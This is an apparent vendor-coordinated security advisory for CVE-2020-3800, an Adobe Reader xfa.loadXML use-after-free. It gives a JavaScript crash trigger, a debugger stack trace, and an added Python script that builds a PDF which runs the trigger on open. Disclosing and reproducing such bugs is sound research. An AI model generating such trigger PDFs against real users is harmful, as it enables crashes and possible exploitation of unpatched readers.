Advisories

Adobe Reader xfa.loadXML Use-after-Free

CVE ID

CVE-2020-3800

Tested Versions

  • Acrobat DC version 2019.008.20064 (Windows 10 64-bit)

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF).

Adobe Reader and Acrobat DC share the same AcroForm.api plugin (file version 19.012.20040.17853), which is where the crash below occurs.

Vulnerability

Adobe Reader and Adobe Acrobat DC crash after executing the following JavaScript code:

xfa.loadXML('<document>\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na'+
'\na\na\na\na\na\n<![CDATA[\n</document>')

The malformed XML (a <![CDATA[ section that is opened and never closed before the end of the document element) triggers a use-after-free: the faulting instruction (mov eax,dword ptr [edi+28h]) reads through a pointer in edi that refers to memory the debugger can no longer read (shown as ???????? in the dump), inside an AcroForm callback invoked from Adobe's Expat-based XML parser (AXE8SharedExpat), as the stack trace below shows. Although there are many indirect calls after this point that could be used to control EIP, many combinations of XML data and JavaScript code were tested and none succeeded in reallocating the freed object, so the impact of this vulnerability may be low.

The crash stack trace is as follows:

This exception may be expected and handled.
eax=007cc0e8 ebx=36dd1fb0 ecx=53549f5a edx=07600000 esi=007cc438 edi=64ba0fb0
eip=53109ce2 esp=007cc10c ebp=007cc138 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
AcroForm!PlugInMain+0x299f2:
53109ce2 8b4728          mov     eax,dword ptr [edi+28h] ds:002b:64ba0fd8=????????
0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 007cc138 53109b57 AcroForm!PlugInMain+0x299f2
01 007cc168 579e4fac AcroForm!PlugInMain+0x29867
02 007cc1ac 579e5a44 AXE8SharedExpat!AXE8_ExpatTerminate+0x329c
03 007cc230 579e4c8d AXE8SharedExpat!AXE8_ExpatTerminate+0x3d34
04 007cc25c 579e7616 AXE8SharedExpat!AXE8_ExpatTerminate+0x2f7d
05 007cc2b0 579ea0bb AXE8SharedExpat!AXE8_ExpatTerminate+0x5906
06 007cc2fc 579ea04b AXE8SharedExpat!AXE8_ExpatTerminate+0x83ab
07 007cc318 579e3bb3 AXE8SharedExpat!AXE8_ExpatTerminate+0x833b
08 007cc340 531051ec AXE8SharedExpat!AXE8_ExpatTerminate+0x1ea3
09 007cc3e8 5310487a AcroForm!PlugInMain+0x24efc
0a 007cc404 53100f71 AcroForm!PlugInMain+0x2458a
0b 007cc408 53150328 AcroForm!PlugInMain+0x20c81
0c 007cc420 53150342 AcroForm!PlugInMain+0x70038
0d 007cc4f4 531502be AcroForm!PlugInMain+0x70052
0e 007cc560 536e093d AcroForm!PlugInMain+0x6ffce
0f 007cc620 536e4728 AcroForm!DllUnregisterServer+0x3df9ed
10 007cc72c 534be9ce AcroForm!DllUnregisterServer+0x3e37d8
11 007cc988 520c4cd5 AcroForm!DllUnregisterServer+0x1bda7e
12 007ccad0 520a8588 EScript!mozilla::HashBytes+0x44295
13 007ccb44 520a2fdf EScript!mozilla::HashBytes+0x27b48
14 007ccff0 520a1e6e EScript!mozilla::HashBytes+0x2259f
15 007cd03c 520a1d7e EScript!mozilla::HashBytes+0x2142e
16 007cd078 520a1cb3 EScript!mozilla::HashBytes+0x2133e
17 007cd0ac 5208a32c EScript!mozilla::HashBytes+0x21273
18 007cd0fc 520cbc09 EScript!mozilla::HashBytes+0x98ec
19 007cd180 520cb8c4 EScript!mozilla::HashBytes+0x4b1c9
1a 007cd334 520cb48c EScript!mozilla::HashBytes+0x4ae84
1b 007cd380 520ca2b7 EScript!mozilla::HashBytes+0x4aa4c
1c 007cd418 521493ef EScript!mozilla::HashBytes+0x49877
1d 007cd478 790b82f7 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x6e5bf
1e 007cd508 790b3d13 AcroRd32!AIDE::PixelPartInfo::operator=+0x30e77
1f 007cd558 78e66bb2 AcroRd32!AIDE::PixelPartInfo::operator=+0x2c893
20 007cd588 78e6712a AcroRd32!AX_PDXlateToHostEx+0x229782
21 007cd5e0 790b7f17 AcroRd32!AX_PDXlateToHostEx+0x229cfa
22 007cd6b8 78a59348 AcroRd32!AIDE::PixelPartInfo::operator=+0x30a97
23 007cd704 78a27d17 AcroRd32!DllCanUnloadNow+0x130478
24 007cd758 789827bd AcroRd32!DllCanUnloadNow+0xfee47
25 007cd7e4 78981b59 AcroRd32!DllCanUnloadNow+0x598ed
26 007cd944 7896ce70 AcroRd32!DllCanUnloadNow+0x58c89
27 007cd9c4 7896c676 AcroRd32!DllCanUnloadNow+0x43fa0
28 007cdabc 7896c1d0 AcroRd32!DllCanUnloadNow+0x437a6
29 007cdaf0 78967f0a AcroRd32!DllCanUnloadNow+0x43300
2a 007cdca4 78965d97 AcroRd32!DllCanUnloadNow+0x3f03a
2b 007ce590 7896557e AcroRd32!DllCanUnloadNow+0x3cec7
2c 007ce5b4 78c35693 AcroRd32!DllCanUnloadNow+0x3c6ae
2d 007ce5cc 78cf7392 AcroRd32!AXSetInitViaPDFL+0x7543
2e 007ce628 78cf7f20 AcroRd32!AX_PDXlateToHostEx+0xb9f62
2f 007ce680 78d469f0 AcroRd32!AX_PDXlateToHostEx+0xbaaf0
30 007ce6e0 75fc0ed2 AcroRd32!AX_PDXlateToHostEx+0x1095c0
31 007ce720 7623f4c4 ole32!CPrivDragDrop::PrivDragDrop+0x172 [com\ole32\com\rot\getif.cxx @ 739] 
32 007ce764 76204f3d RPCRT4!Invoke+0x34
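To make the report reproducible, the following Python script (an added example, not part of the original advisory or of Adobe's code) rebuilds the xfa.loadXML trigger string from the PoC above with the padding line count as a parameter, shows that a stock Expat build rejects the same XML as malformed rather than parsing it, and writes the JavaScript into a minimal one-page PDF as an /OpenAction so the crash can be reproduced under a debugger. The minimal XFA skeleton attached under /AcroForm /XFA, the object layout and the output file name are assumptions: the advisory does not say how the JavaScript was delivered, and the xfa scripting object is generally only available to document scripts in a document that carries an XFA form, hence the skeleton.

```python
"""Reproduction helper for the xfa.loadXML use-after-free (added example).

Not part of the original advisory.  It rebuilds the trigger string, checks it
against stock Expat, and packs it into a minimal PDF as an /OpenAction.
"""
import json
import xml.parsers.expat


def build_trigger_xml(lines: int = 251) -> str:
    """Rebuild the XML passed to xfa.loadXML in the advisory's PoC.

    The document element is padded with newline + "a" text lines, then a
    <![CDATA[ section is opened and never closed before </document>.
    The PoC uses 251 padding lines; the advisory does not say the count
    matters, so it is a parameter here.
    """
    return "<document>" + "\na" * lines + "\n<![CDATA[\n</document>"


def build_js(lines: int = 251) -> str:
    """JavaScript statement that feeds the malformed XML to xfa.loadXML."""
    # json.dumps yields a double-quoted JS string literal with \n escapes.
    return "xfa.loadXML(" + json.dumps(build_trigger_xml(lines)) + ");"


def expat_rejects(xml_text: str):
    """Return the error a stock Expat build raises for xml_text, else None.

    A conforming parser refuses the advisory's input, so what is exercised
    in Reader is how AXE8SharedExpat and AcroForm handle malformed input.
    """
    parser = xml.parsers.expat.ParserCreate()
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError as err:
        return str(err)
    return None


# Minimal XFA skeleton (an assumption) so that Reader exposes the xfa object.
XFA_SKELETON = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
    b'<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">\n'
    b'<subform name="form1"><pageSet><pageArea name="Page1">'
    b'<contentArea x="0in" y="0in" w="8.5in" h="11in"/>'
    b'</pageArea></pageSet></subform>\n'
    b'</template>\n'
    b'</xdp:xdp>'
)


def pdf_literal(text: str) -> bytes:
    """Escape text for a PDF literal string (backslash and parentheses)."""
    escaped = text.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + escaped.encode("latin-1") + b")"


def build_pdf(js: str) -> bytes:
    """Wrap js in a one-page PDF that runs it from /OpenAction."""
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R"
        b" /AcroForm << /Fields [] /XFA 5 0 R >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /JavaScript /JS " + pdf_literal(js) + b" >>",
        b"<< /Length %d >>\nstream\n" % len(XFA_SKELETON) + XFA_SKELETON + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                      # byte offset for the xref table
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objects) + 1, xref_pos)
    return bytes(out)


def xref_is_consistent(pdf: bytes) -> bool:
    """Check that startxref and every in-use xref entry point where they claim."""
    start = int(pdf[pdf.rindex(b"startxref") + len(b"startxref"):].split()[0])
    if not pdf.startswith(b"%PDF-") or pdf[start:start + 4] != b"xref":
        return False
    lines = pdf[start:].split(b"\n")
    first, count = (int(v) for v in lines[1].split())
    for i, entry in enumerate(lines[2:2 + count]):
        offset, _gen, kind = entry.split()
        if kind == b"n" and not pdf[int(offset):].startswith(b"%d 0 obj" % (first + i)):
            return False
    return True


if __name__ == "__main__":
    print("stock expat says:", expat_rejects(build_trigger_xml()))
    poc = build_pdf(build_js())
    assert xref_is_consistent(poc)
    with open("xfa_loadxml_poc.pdf", "wb") as fh:   # file name is an assumption
        fh.write(poc)
    print("wrote xfa_loadxml_poc.pdf, %d bytes" % len(poc))
```

Open the generated file in the tested Reader build under WinDbg to get the stack shown above; change the lines argument to build_js to check whether the amount of padding influences the crash, and swap the /OpenAction for the JavaScript console of an existing XFA document if the skeleton form is not accepted.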

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB20-13.

Timeline

  • 2020-02-04 Vendor disclosure
  • 2020-03-17 Vendor patched

Credit

Discovered by bit